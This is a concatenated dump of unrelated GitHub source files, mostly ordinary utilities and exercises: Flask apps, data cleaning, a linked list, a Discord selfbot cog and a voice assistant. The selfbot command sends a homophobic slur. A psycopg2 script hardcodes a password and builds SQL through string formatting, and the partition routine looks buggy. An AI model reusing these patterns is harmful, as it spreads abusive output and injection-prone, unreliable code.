num_concurrent_uploads: int = hp.optional(\"Maximum number of concurrent uploads.\", default=4)\n use_procs: bool = hp.optional(\"Whether to perform file uploads in background processes (as opposed to threads).\",\n default=True)\n upload_staging_folder: Optional[str] = hp.optional(\n \"Staging folder for uploads. If not specified, will use a temporary directory.\", default=None)\n\n def initialize_object(self) -> ObjectStoreLogger:\n return ObjectStoreLogger(\n provider=self.object_store_hparams.provider,\n container=self.object_store_hparams.container,\n provider_kwargs=self.object_store_hparams.get_provider_kwargs(),\n object_name=self.object_name,\n should_log_artifact=import_object(self.should_log_artifact)\n if self.should_log_artifact is not None else None,\n num_concurrent_uploads=self.num_concurrent_uploads,\n upload_staging_folder=self.upload_staging_folder,\n use_procs=self.use_procs,\n )\n\n\nlogger_registry = {\n \"file\": FileLoggerHparams,\n \"wandb\": WandBLoggerHparams,\n \"progress_bar\": ProgressBarLoggerHparams,\n \"in_memory\": InMemoryLoggerHparams,\n \"object_store\": ObjectStoreLoggerHparams,\n}\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/loggers/logger_hparams.py","file_name":"logger_hparams.py","file_ext":"py","file_size_in_byte":13296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29210902269","text":"import json\nfrom difflib import get_close_matches\n\ndata = json.load(open('English Thesaurus/data.json'))\n\ndef translate(word):\n \n # Turn the inputted word into lowercase\n word = word.lower()\n\n # If the inputted word is in the dictionary then return the definition\n if word in data:\n return data[word][0]\n \n # If the word is not in the dictionary BUT has close matches, ask if they meant the MOST similar\n elif len(get_close_matches(word, data.keys())) > 0:\n did_you_mean = input(f'Did you mean {get_close_matches(word, data.keys())[0]}? (Y/N) ')\n\n # If they meant the most similar and typed 'y', then return the meaning of that word\n if did_you_mean.lower() == 'y':\n return f'{get_close_matches(word, data.keys())[0].title()} : {data[get_close_matches(word, data.keys())[0]][0]}'\n\n # If they didn't mean the most similar word then tell them the word is not in the dictionary\n else:\n return 'Sorry, word not in dictionary'\n \n # If the word has no similar matches and is not in the dictionary then tell them.\n else:\n return 'Word not in dictionary'\n\ninput_word = input('Enter a word: ')\n\nprint(translate(input_word))\n","repo_name":"0xhascoin/Python-Mega-Course","sub_path":"Application 1 English Thesaurus/thesaurus.py","file_name":"thesaurus.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72328331367","text":"class Node: \n def __init__(self, data, next_node=None, prev_node=None):\n self.data = data\n self.next_node = next_node\n self.prev_node = prev_node\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert_into_ll(self, data):\n new_node = Node(data)\n \n if self.head:\n active_node = self.head\n while active_node.next_node:\n active_node = active_node.next_node\n\n active_node.next_node = new_node\n new_node.prev_node = active_node\n else:\n self.head = new_node\n \n def print_ll(self):\n cur_node = self.head\n while cur_node:\n print(cur_node.data)\n cur_node = cur_node.next_node\n\n def partition(self, p):\n \"\"\" Prompt: Write code to partition a linked list around a value p\n \n Parameters: \n p: integer\n Partition value \n Requirements:\n All nodes less than partition value p come before all nodes greater\n than or equal to partition value p\n \"\"\"\n cur_node = self.head\n end_node = self.head\n\n while end_node.next_node:\n end_node = end_node.next_node\n \n end_ref = end_node\n while end_node.prev_node: \n while end_node.data < p:\n active_node = end_node\n next_node = end_node.next_node\n prev_node = end_node.prev_node\n if end_node.next_node:\n next_node.prev_node = prev_node\n if end_node.prev_node:\n prev_node.next_node = next_node\n active_node.next_node = cur_node.next_node\n cur_node.next_node = active_node\n end_node = prev_node\n end_node = end_node.prev_node\n\n while end_node.next_node:\n end_node = end_node.next_node\n\n active_node = self.head\n if not active_node.data < p:\n next_node = active_node.next_node\n next_node.prev_node = None\n active_node.next_node = None\n end_node.next_node = active_node\n active_node.prev_ref = end_node\n self.head = next_node\n \n def palindrome(self):\n \"\"\"Prompt: Implement a function to check if a linked list is a palindrome\n\n Returns boolean\n \"\"\"\n front_node = self.head\n end_node = self.head\n while end_node.next_node:\n end_node = end_node.next_node\n\n while not end_node == front_node:\n if end_node.data == front_node.data:\n if end_node.prev_node == front_node.next_node:\n return True\n end_node = end_node.prev_node\n front_node = front_node.next_node\n else:\n return False\n\ndef manipulate_ll(vals, p=None, pal=False):\n \"\"\" Function to manipulate linked list\n\n Parameters:\n vals: list of integers\n build linked list out of these integers\n p: Integer\n if a p value is passed, it will run the partition function\n pal: Boolean\n If pal, test if Linked list is a palindrome\n \"\"\"\n LL = LinkedList()\n for val in vals:\n LL.insert_into_ll(val)\n\n print(\"Linked List for reference:\")\n LL.print_ll()\n\n if p:\n LL.partition(p)\n print(\"partitioned:\")\n LL.print_ll()\n\n if pal:\n return LL.palindrome()\n\n","repo_name":"cseydlitz/practice","sub_path":"LinkedLists/double_linked_list_manipulation.py","file_name":"double_linked_list_manipulation.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12657992696","text":"a,b,w=map(int,input().split())\nw*=1000\nval=w//b\nval2=w//a+1\nmi=10**15\nmx=10**-15\nfor i in range(val,val2+1):\n if a<=w/i<=b:\n mi=min(mi,i)\n mx=max(mx,i)\nif mi==10**15 and mx==10**-15:\n print(\"UNSATISFIABLE\")\n exit()\nprint(mi,mx)\n","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc195/abc195_b/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9593286406","text":"from flask import Flask, jsonify\n\nfrom config import FlaskConfig\nfrom proxy.ProxyManager import ProxyManager\n\napp = Flask(__name__)\npm = ProxyManager()\n\n\n@app.route(\"//get\")\ndef get(type):\n if type:\n proxy = pm.get(type)\n return proxy.decode(\"utf-8\") if proxy else \"no useful proxy\"\n\n\n@app.route(\"/info\")\ndef info():\n return jsonify(pm.info())\n\n\ndef run():\n host = FlaskConfig(\"host\")\n port = FlaskConfig(\"port\")\n app.run(host=host, port=port)\n\n\nif __name__ == '__main__':\n run()\n\n\n","repo_name":"zhumian/proxypool","sub_path":"api/ProxyApi.py","file_name":"ProxyApi.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9912393146","text":"from typing import Optional\nfrom urllib.parse import quote\n\nfrom SmartDjango import E, Hc\n\nfrom Account.models import Account\nfrom Channel.channels.base import BaseChannel\nfrom utils.grabber import Grabber\n\nquote_safe = lambda x: quote(x, safe='')\n\n\n@E.register(id_processor=E.idp_cls_prefix())\nclass BarkError:\n REQUEST = E('Bark Request', hc=Hc.InternalServerError)\n\n\nclass Bark(BaseChannel):\n class Body:\n uri: str\n content: str\n title: Optional[str] = None\n sound: Optional[str] = None\n icon: Optional[str] = None\n group: Optional[str] = None\n url: Optional[str] = None\n\n worker = Grabber()\n active = True\n\n @classmethod\n def handler(cls, body: Body, account: Account):\n if not body.uri.endswith('/'):\n body.uri += '/'\n\n if not body.title:\n body.title = ''\n body.title = '【{}】{}'.format(account.nick, body.title)\n path = '%s%s/%s' % (body.uri, quote_safe(body.title), quote_safe(body.content))\n\n query = dict()\n params = ['sound', 'url', 'icon', 'group']\n for param in params:\n value = getattr(body, param)\n if value:\n query[param] = value\n\n try:\n cls.worker.get(path, query=query)\n except Exception as err:\n raise BarkError.REQUEST(debug_message=err)\n","repo_name":"Jyonn/NotificatorX","sub_path":"Channel/channels/bark.py","file_name":"bark.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73677827048","text":"def perfometer_check_mk_xfs_quota(row, check_command, perf_data):\n # Uncomment and restart Apache to debug:\n #return repr(perf_data), ''\n # Data sample: \n # [\n # (u'b__/srv/xfstest__test1', u'2097152', u'', u'100', u'50', u'', u''),\n # (u'i__/srv/xfstest__test1', u'2', u'', u'0', u'0', u'', u'')\n # ]\n color_b = { 0: '#60E0A0', 1: '#FFFF00', 2: '#FF0000', 3: '#FFBF00' }[row[\"service_state\"]]\n color_i = { 0: '#60A0E0', 1: '#FFFF80', 2: '#FF0080', 3: '#FFBF80' }[row[\"service_state\"]]\n half_b = 100000000\n half_i = 1000000\n\n if (perf_data[0][0].startswith(\"b__\")):\n blocks = float(perf_data[0][1])\n elif (perf_data[1][0].startswith(\"b__\")):\n blocks = float(perf_data[1][1])\n if (perf_data[0][0].startswith(\"i__\")):\n inodes = float(perf_data[0][1])\n elif (perf_data[1][0].startswith(\"i__\")):\n inodes = float(perf_data[1][1])\n\n text = \"\"\n if (blocks >= 0):\n human_b = number_human_readable(blocks, 0, \"Blk\")\n text += \"%s\" % human_b\n if (inodes >= 0):\n human_i = number_human_readable(inodes, 0, \"Inode\")\n if (text):\n text += \" / \"\n text += \"%s\" % human_i\n return text, perfometer_logarithmic_dual_independent(\n blocks, color_b, half_b, 10, inodes, color_i, half_i, 10)\n\nperfometers[\"check_mk-xfs_quota\"] = perfometer_check_mk_xfs_quota\n\n#\n# EOF\n","repo_name":"frank-fegert/check_mk","sub_path":"xfs_quota/web/plugins/perfometer/xfs_quota.py","file_name":"xfs_quota.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74656786727","text":"# encoding=utf-8\n\"\"\"\n@Time : 2020/4/4 13:18 \n@Author : LiuYanZhe\n@File : cleanData.py \n@Software: PyCharm\n@Description: 清洗数据\n\"\"\"\nimport pandas as pd\n\ndf1 = pd.read_csv('../data/China_history_2020_04_04.csv')\nprint(df1.columns)\nprint(df1.loc[:68, ['date', 'today_confirm', 'total_confirm', 'total_heal', 'total_dead']])\ndf2 = df1.loc[:68, ['date', 'today_confirm']]\ntemp_df = df1['total_confirm'] - df1['total_heal'] - df1['total_dead'] # 计算出的当日现存人数\ndf2['now'] = temp_df\ndead_rate = df1['total_dead'] / (df1['total_dead'] + df1['total_heal'])\ndf2['dead_rate'] = dead_rate\nheal_rate = df1['total_heal'] / (df1['total_dead'] + df1['total_heal'])\ndf2['heal_rate'] = heal_rate\nprint(df2)\ndf2.to_csv('../data/Chinahistory_today_now_20200328.csv')\n# print(type(df2))\n","repo_name":"lyz21/MachineLearning","sub_path":"Convid19/ChinaPlot/cleanData.py","file_name":"cleanData.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37009475929","text":"import psycopg2\nimport sys\nimport os\nimport csv\n\ntry:\n conn = psycopg2.connect(dbname=\"snakesdb\", user=\"fox\", password=\"senha\")\nexcept:\n print(\"Error: It was not possible to connect to the database\")\n sys.exit(1)\n\ncur = conn.cursor()\n\nfilename = \"../../data/N-glycans_table.csv\"\nwith open(filename, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n fieldnames = reader.fieldnames\n for row in reader:\n gl_id = row[fieldnames[0]]\n try:\n cur.execute(\"INSERT INTO glycans(gl_id) VALUES ('{0}');\".format(gl_id))\n except psycopg2.ProgrammingError as e:\n print(\"Insert error\")\n print(e)\n conn.rollback()\n print(\"Rollback complete\")\n\n conn.commit()\n\n for sp in fieldnames[2:]:\n if row[sp] == '0':\n continue\n species = sp.split()[1]\n try:\n cur.execute(\"INSERT INTO gl_sn(gl_id, sn_sp) VALUES ('{0}', '{1}');\"\\\n .format(gl_id, species))\n except psycopg2.ProgrammingError as e:\n print(\"Insert error\")\n print(e)\n conn.rollback()\n print(\"Rollback complete\")\n\n conn.commit()\n\ncur.close()\nconn.close()\n\n \n\n","repo_name":"vwraposo/TCC","sub_path":"src/db/insert_glycan_data.py","file_name":"insert_glycan_data.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15254224631","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\n\n# Create an instance of Flask\napp = Flask(__name__)\n\n# Use PyMongo to establish Mongo connection to mars_db database\nmongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_db\")\n\n@app.route(\"/\")\ndef index():\n print(\"Querying the data\")\n marsdata = mongo.db.marsdata.find_one()\n print(\"Started rendering the page...\")\n # print(marsdata.html_table)\n return render_template(\"index.html\", listings=marsdata)\n\n@app.route(\"/scrape\")\ndef scraper():\n \n # remove previous documents before insert\n mongo.db.marsdata.delete_many({})\n\n # Run the scrape function\n mars_data = scrape_mars.scrape()\n print(\"Completed scraping and before insert to database\")\n \n # Insert the document into the database\n mongo.db.marsdata.insert_one(mars_data)\n \n print(\"Return back to home page\")\n # Redirect back to home page\n return redirect(\"/\", code=302)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"raviselva4/web-scraping-challenge","sub_path":"Mission_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9881554877","text":"from dagster import (\n Definitions,\n EnvVar,\n ScheduleDefinition,\n define_asset_job,\n load_assets_from_package_module,\n)\nfrom dagster_aws.s3 import S3PickleIOManager, S3Resource\n\nfrom . import assets\n\ndaily_refresh_schedule = ScheduleDefinition(\n job=define_asset_job(name=\"all_assets_job\"), cron_schedule=\"0 0 * * *\"\n)\n\nmy_s3_resource = S3Resource()\n\ndefs = Definitions(\n assets=load_assets_from_package_module(assets),\n # The AWS resources use boto under the hood, so if you are accessing your private\n # buckets, you will need to provide the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY\n # environment variables or follow one of the other boto authentication methods.\n # Read about using environment variables and secrets in Dagster:\n # https://docs.dagster.io/guides/dagster/using-environment-variables-and-secrets\n resources={\n # With this I/O manager in place, your job runs will store data passed between assets\n # on S3 in the location s3:///dagster/storage/.\n \"io_manager\": S3PickleIOManager(\n s3_resource=my_s3_resource,\n s3_bucket=EnvVar(\"S3_BUCKET\"),\n ),\n \"s3\": my_s3_resource,\n },\n schedules=[daily_refresh_schedule],\n)\n","repo_name":"dagster-io/dagster","sub_path":"examples/quickstart_aws/quickstart_aws/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"2301065045","text":"import pandas as pd\nimport ast\nimport json\n\n# def compare_dataframes_by_column(\n# df1,\n# df2,\n# comparison_column\n# ):\n# return\n#\n# def get_data_frame_comparison(\n# df1,\n# df2,\n# comparison_column\n# ):\n# result = {\n# \"no_of_duplicate_records_by_code\": None,\n# \"index_of_new_record\":\n# }\n#\n# return\n\n\n# How many new restaurant codes?\n\n# How many known restaurants have changed values?\n\n# Has Restaurant moved? (geo coordinate comparison)\n\n# Has Budget Changed?\n\n# Has Cusine changed\n\n# Create\n\n\nif __name__ == \"__main__\":\n\n file_name = \"../CW1/final_data.csv\"\n\n data_frame = pd.read_csv(file_name)\n\n data_frame_sub = data_frame.iloc[:10]\n #print(data_frame_sub)\n\n set_cusine_id = set()\n\n cusine_col = \"characteristics.cuisines\"\n\n cusines =[] \n\n for index, row in data_frame.iterrows():\n characteristics_cusine = ast.literal_eval(row[cusine_col])\n for dictionary in characteristics_cusine:\n if dictionary[\"id\"] not in set_cusine_id:\n cusines.append(dictionary)\n set_cusine_id.add(dictionary[\"id\"])\n\n\n\n \n cusine_dataframe = pd.DataFrame(cusines)\n\n\n print(cusine_dataframe)\n","repo_name":"jangomango87/CW1_Final","sub_path":"CW2/compare_data.py","file_name":"compare_data.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73813642087","text":"from discord.ext import commands\n\nimport discord\n\n\n\nclass sinfull(commands.Cog):\n\n\n def __init__(self, client):\n self.client = client\n\n # Example how to make custom commands: \n @commands.command()\n async def lolol(self, ctx):\n await ctx.send(\"hey fag\")\n\n\n\ndef setup(client):\n client.add_cog(sinfull(client))\n","repo_name":"9s6/sinfull-selfbot","sub_path":"custom-commands/custom-commands.py","file_name":"custom-commands.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74536194407","text":"#!/usr/bin/python3\n\ndef search_replace(my_list, search, replace):\n jidecopy = []\n for i in range(len(my_list)):\n if my_list[i] == search:\n jidecopy.append(replace)\n else:\n jidecopy.append(my_list[i])\n return jidecopy\n","repo_name":"babajideawoseemo/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2565830875","text":"\"\"\"\n@deprecated, see pip install funcoperators\n\"\"\"\n\nimport itertools\n\n# http://stackoverflow.com/questions/11173660/can-one-partially-apply-the-second-argument-of-a-function-that-takes-no-keyword\ndef _partial(func, *args, **keywords):\n def newfunc(*fargs, **fkeywords):\n newkeywords = keywords.copy()\n newkeywords.update(fkeywords)\n return func(*(newfunc.leftmost_args + fargs + newfunc.rightmost_args), **newkeywords)\n \n newfunc.func = func\n args = iter(args)\n newfunc.leftmost_args = tuple(itertools.takewhile(lambda v: v != Ellipsis, args))\n newfunc.rightmost_args = tuple(args)\n newfunc.keywords = keywords\n return newfunc\n\nclass partial: \n def __init__(self, f, *args, **kwargs):\n if args or kwargs:\n self.func = _partial(f, *args, **kwargs) if args or kwargs else f\n \n self.leftmost_args = self.func.leftmost_args\n self.rightmost_args = self.func.rightmost_args\n self.keywords = self.func.keywords\n \n else:\n self.func = f\n self.leftmost_args = ()\n self.rightmost_args = ()\n self.keywords = kwargs\n \n def bind(self, *args, **kwargs):\n return partial(self.func, *args, **kwargs)\n \n def __getitem__(self, args):\n return self.bind(*args) if isinstance(args, tuple) else self.__getitem__((args,))\n \n def __call__(self, *args, **kwargs):\n return self.func(*args, **kwargs)\n \n def __str__(self):\n return \"PartialObject\".format(self.func, self.leftmost_args, self.rightmost_args, self.keywords)\n \n @staticmethod\n def fix(*args, **kwargs):\n return partial(partial, ..., *args, **kwargs)\n \nclass auto_partial(partial):\n def __call__(self, *args, **kwargs):\n try:\n return self.func(*args, **kwargs)\n except TypeError:\n return self.bind(*args, **kwargs)\n \n @staticmethod\n def fix(*args, **kwargs):\n return partial(auto_partial, ..., *args, **kwargs)\n\nif __name__ == '__main__':\n # Normal function\n f0 = partial(pow)\n \n print(f0(2,3))\n \n # Operator [] or .bind to apply positional arguments partiallity\n # Or constructor\n f1 = partial(pow)[2]\n f1 = partial(pow).bind(2)\n f1 = partial(pow, 2)\n \n print(f1(3))\n \n # auto_partial \"guess\" within a call if is it a final call or some arguments are missing\n f2 = auto_partial(pow)(2)\n f2 = auto_partial(pow, 2)\n \n print(f2(3))\n \n # Ellipsis can be used as position place holder\n f3 = partial(pow)[..., 3]\n f3 = partial(pow, ..., 3)\n \n print( f3(2) )\n \n # Multiple arguments are easy\n f4 = partial(print)[\"Hello\", ..., 5]\n f4 = partial(print, \"Hello\", ..., 5)\n \n f4(\"Bob\")\n \n # For keywords arguments, constructor or .bind is required\n f5 = partial(print, \"Hello\", ..., 5, sep=' ++ ')\n f5 = partial(print, \"Hello\", ..., 5).bind(sep=' ++ ')\n f5 = partial(print).bind(\"Hello\", ..., 5, sep=' ++ ')\n \n f5(\"Bob\")\n \n # Can be used as a decorator to enhance simple functions\n @partial\n def f(x,y):\n print(\"{} + {} = {}\".format(x, y, x + y))\n \n f[1](2)\n \n # .fix can fix an argument, here y will always be 5. But this is confusing\n \n @partial.fix(..., 5)\n def f(x,y,z):\n print(\"x\", x, \"y\", y, \"z\", z)\n \n \n f[1](2)\n","repo_name":"robertvandeneynde/python","sub_path":"deprecated/myfunctool.py","file_name":"myfunctool.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"7739949086","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'survey'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^logout/$', views.logout_view, name='logout'),\n url(r'^my-surveys/$', views.mysurveys_view, name='my_surveys'),\n url(r'^survey-create/(?P[0-9]+)$', views.createSurvey, name='survey_create'),\n url(r'^survey-create/$', views.createSurvey, name='survey_create'),\n url(r'^survey-edit/(?P[0-9]+)$', views.editSurvey, name='survey_edit'),\n url(r'^survey-fill/(?P[0-9]+)$', views.fillSurvey, name='survey_fill'),\n url(r'^survey-results/(?P[0-9]+)$', views.resultsSurvey, name='survey_results'),\n url(r'^survey-data/$', views.dataSurvey, name='survey_data'),\n url(r'^survey-delete/$', views.deleteSurvey, name='survey_delete'),\n]\n","repo_name":"z3t0/survey-server","sub_path":"survey/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11763984640","text":"import os\r\nimport random\r\nimport shutil\r\n\r\nlabel_conversion = {'01': 'neutral',\r\n '03': 'happy',\r\n '04': 'sad',\r\n '05': 'angry',\r\n '06': 'fear',\r\n '07': 'disgust',\r\n '08': 'ps'}\r\n \r\n#the path for dataset in my dir\r\n\r\nos.chdir('C:\\\\Users\\\\Hrishikesh\\\\Desktop\\\\Project\\\\#Project\\\\dataset')\r\ntess = os.walk('C:\\\\Users\\\\Hrishikesh\\\\Desktop\\\\Project\\\\#Project\\\\dataset')\r\n\r\n\r\n# Looping through the files to change their name\r\n\r\nfor files in tess: \r\n for filename in files[2]:\r\n if filename.startswith('OAF'):\r\n # Separate base from extension\r\n base, extension = os.path.splitext(filename)\r\n for key, value in label_conversion.items():\r\n if base.endswith(value):\r\n random_list = random.sample(range(10, 99), 7)\r\n file_name = '-'.join([str(i) for i in random_list])\r\n file_name_with_correct_emotion = (file_name[:6] + key + file_name[8:] + extension).strip()\r\n shutil.move(filename, file_name_with_correct_emotion)\r\n\r\n else:\r\n base, extension = os.path.splitext(filename)\r\n for key, value in label_conversion.items():\r\n if base.endswith(value):\r\n random_list = random.sample(range(10, 99), 7)\r\n file_name = '-'.join([str(i) for i in random_list])\r\n file_name_with_correct_emotion = (file_name[:6] + key + file_name[8:] + extension).strip()\r\n shutil.move(filename, file_name_with_correct_emotion)\r\n\r\n\r\n","repo_name":"hrishi09/SED_Model","sub_path":"Dataset samples/change_tess_files_name.py","file_name":"change_tess_files_name.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19418091767","text":"import os\r\nimport datetime as dt\r\nimport wikipedia as wik\r\nimport speech_recognition as sr\r\nimport pyautogui as pg\r\nimport random\r\n# Arquivo reservado para criação de funçõe para a IA LIA\r\n# Desenvolvido por Matheus\r\n\r\n# Executar algum outro arquivo\r\n\r\n\r\ndef executar_arquivo(maquina, nome):\r\n maquina.say('Qual deseja executar? ')\r\n maquina.runAndWait()\r\n audio1 = 'Tem certeza que escreveu corretamente?'\r\n audio2 = 'Arquivo inexistente no diretório de execução de scripts'\r\n audio3 = ('Esse arquivo não consta no meu banco de dados')\r\n audios = [audio1, audio2, audio3]\r\n pause = True\r\n while pause == True:\r\n caminho = input('Digite o nome do arquivo: ')\r\n arquivo = (\r\n 'C:\\Python_Projects\\Programas_por_Math_Gama\\IA LIA\\ScriptsDeExecucao/'+caminho)\r\n if caminho == 'sair':\r\n maquina.say('Voltando a página principal')\r\n maquina.runAndWait()\r\n pause = False\r\n elif not os.path.exists(arquivo):\r\n maquina.say(random.choice(audios))\r\n maquina.runAndWait()\r\n else:\r\n maquina.say('Executando o arquivo '+caminho)\r\n maquina.runAndWait()\r\n os.startfile(arquivo)\r\n\r\n pause = False\r\n\r\n# Dizer as horas\r\n\r\n\r\ndef saber_horas(maquina, nome):\r\n hora2 = dt.datetime.now().strftime('%H:%M')\r\n hora = dt.datetime.now().strftime('%H%M')\r\n teste = int(hora)\r\n if teste <= 1159:\r\n maquina.say('Bom dia ' + nome +\r\n ', agora são exatamente' + hora2+' da manhã')\r\n maquina.runAndWait()\r\n elif (teste >= 1200) & (teste <= 1800):\r\n maquina.say('Boa tarde ' + nome +\r\n ', agora são exatamente' + hora2+' da tarde')\r\n maquina.runAndWait()\r\n elif (teste >= 1900) & (teste <= 100):\r\n maquina.say('Boa noite ' + nome +\r\n ', agora são exatamente' + hora2 + ' da noite')\r\n maquina.runAndWait()\r\n\r\n# Pesquisar algo na wikipedia\r\n\r\n\r\ndef func_search(maquina, nome):\r\n maquina.say('Sobre quem \\n ou oque deseja que eu procure?')\r\n maquina.runAndWait()\r\n pesquisa = input('Digite sobre oque deseja pesquisar: ')\r\n if (pesquisa == 'exit') | (pesquisa == 'sair'):\r\n maquina.say('Saindo do sistema \\n até mais ' + nome.read())\r\n maquina.runAndWait()\r\n else:\r\n wik.set_lang('pt')\r\n resultado = wik.summary(pesquisa, 2)\r\n print(resultado)\r\n maquina.say(resultado)\r\n maquina.runAndWait()\r\n\r\n# Comando de voz\r\n\r\n\r\ndef comando_voz(maquina, nome):\r\n maquina.say('Comando de voz ativado')\r\n maquina.runAndWait()\r\n audio = sr.Recognizer()\r\n try:\r\n with sr.Microphone() as source:\r\n maquina.say('O microfone está OK')\r\n maquina.runAndWait()\r\n print('Ouvindo...')\r\n voz = audio.listen(source)\r\n comando = audio.recognize_google(voz, 'pt-BR')\r\n comando = comando.lower()\r\n\r\n if 'executa um arquivo' in comando:\r\n executar_arquivo(maquina, nome)\r\n\r\n elif 'que horas' in comando:\r\n maquina.say('horas')\r\n # saber_horas(maquina, nome)\r\n\r\n elif 'conta uma piada' in comando:\r\n contar_piada(maquina)\r\n\r\n elif 'sair' in comando:\r\n maquina.say('Saindo do sistema, até mais '+nome)\r\n maquina.runAndWait()\r\n except:\r\n print('microfone não esta ok')\r\n\r\n# Contar uma piada aleatória\r\n\r\n\r\ndef contar_piada(maquina):\r\n piada01 = 'Como juntar duas motos? \\nPega as duas e Yamaha.'\r\n piada02 = 'Por que o homem invisível recusou uma oferta de emprego?\\nPorque ele não se via trabalhando com aquilo'\r\n piada03 = 'Como transformar um giz em uma cobra?\\nÉ só colocar na água que o giz bóia'\r\n piada04 = 'O que pediu o astronauta claustrofóbico?\\nUm pouco de espaço'\r\n piada05 = 'Por que um fantasma entrou no elevador?\\nPara elevar o espírito.'\r\n piada06 = 'Qual a diferença entre uma pizza e um judeu?\\nA pizza não grita no fogo\\nEssa foi pesada até mesmo pro Pericles\\nTa lôuco fiquei até triste'\r\n piada07 = 'Ana e César foram à maternidade para o nascimento do filho\\nO bebê nasceu de cesareana'\r\n piada08 = 'Quer ouvir duas piadas curtas e uma piada longa?\\nPiada, piada, piaaaaaaaaaaaaaada'\r\n piada09 = 'Um homem sentou em cima de um cachorro. Qual é o nome do filme?\\nSento em um dálmata'\r\n piada10 = 'Um rapaz viu o Thor de perto. Qual o nome dele?\\nVi-thor'\r\n audios = ['Se liga nessa piada', 'Essa vai ser engraçada se liga',\r\n 'Mano, essa aqui eu ri pakas', 'Olha essa']\r\n piadas = [piada01, piada02, piada03, piada04, piada05,\r\n piada06, piada07, piada08, piada09, piada10]\r\n maquina.say(random.choice(audios))\r\n maquina.say(random.choice(piadas))\r\n maquina.runAndWait()\r\n","repo_name":"mth-gama/Assistent_Lia","sub_path":"Funcoes_LIA.py","file_name":"Funcoes_LIA.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29154076126","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef BuildProbas(Size=100, a=1, b=1):\n Probs = [0 for i in xrange(Size)]\n for i in xrange(Size):\n for j in xrange(Size):\n Probs[i]+=float(abs(i-j)**a)/float((i+j+2)**b)\n Probs = np.array(Probs)\n Probs/=Probs.sum()\n return Probs\n \n\ndef PlotProbs(Probs, Plotlabel = \"\"):\n CumProbs = Probs\n Xvalues= [float(i+1)/len(CumProbs)*100 for i in xrange(len(CumProbs))]\n CumProbs *= float(len(CumProbs))/100.0\n plt.plot(Xvalues,CumProbs, label = Plotlabel)\n return\n\ndef FindMin(Probs):\n return Probs.argmin()+1\n","repo_name":"JanFialkowski/Rankingnetwork","sub_path":"NodeProbs.py","file_name":"NodeProbs.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22628612193","text":"\nclass eng_agnt(UVMAgent):\n\n # // constructor\n def __init__(self, name, parent):\n UVMAgent.__init__(self, name, parent)\n self.driver = None\n self.sequencer = None\n self.monitor = None\n self.tag = \"eng_agnt_\" + name\n\n # // build_phase\n def build_phase(self, phase):\n UVMAgent.build_phase(self, phase)\n self.monitor = ubus_slave_monitor.type_id.create(\"u_slv_monitor\", self)\n if self.get_is_active() == UVM_ACTIVE:\n self.driver = ubus_slave_driver.type_id.create(\"u_slv_driver\", self)\n self.sequencer = ubus_slave_sequencer.type_id.create(\"u_slv_sequencer\", self)\n\n # connect_phase\n def connect_phase(self, phase):\n if self.get_is_active() == UVM_ACTIVE:\n uvm_info(self.tag, \"Connecting comps in active mode now\",\n UVM_MEDIUM)\n self.driver.seq_item_port.connect(self.sequencer.seq_item_export)\n 